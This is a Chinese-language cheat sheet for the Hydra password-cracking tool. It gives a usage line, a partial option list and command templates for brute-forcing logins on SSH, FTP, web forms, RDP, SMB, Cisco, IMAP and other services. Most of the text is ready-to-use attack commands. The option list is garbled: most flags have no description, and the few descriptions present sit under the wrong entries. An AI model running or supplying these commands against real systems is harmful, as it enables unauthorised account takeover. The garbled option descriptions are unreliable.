hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
参数解释如下。
- -R
- -S
- -s <port>
- -l <LOGIN>
- -L <FILE>
- -p <PASS>
- -P <FILE>
- -e <ns>
- -C <FILE>
- 使用冒号分割格式,如"admin:123456"来代替-L/-P
- -M <FILE>
- -o <FILE>
- -f
- 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
- -t <TASKS>
- -w <TIMME>
- -v/-V
- Server
- Servicee
- 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
下面是一些常用服务的破解命令。
1、破解ssh:
hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、GET/POST方式提交,破解web登录:
hydra -l 用户名 -P password_file 127.0.0.1 http-get-form/http-post-form "vulnerabilities/brute/:username=^USER^&password=^PASS^&submit=login:F=Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=xxxxxxx"
说明:引号内的部分是自行构建的参数,这些参数用冒号隔开。第一个参数是接受收据的地址;第二个参数是页面接受的数据,需要破解的参数用^符号包起来;第三个参数是判断破解是否成功的标志(F代表错误,S代表正确);第四个参数是本次请求中的head cookie。
4、破解https:
hydra -m /index.php -l muts -P pass.txt 127.0.0.1 https
5、破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
6、破解cisco:
hydra -P pass.txt ip cisco
hydra -m cloud -P pass.txt ip cisco-enable
7、破解smb:
hydra -l administrator -P pass.txt ip smb
8、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
9、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
10、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://ip
11、破解imap:
hydra -L user.txt -p secret ip imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN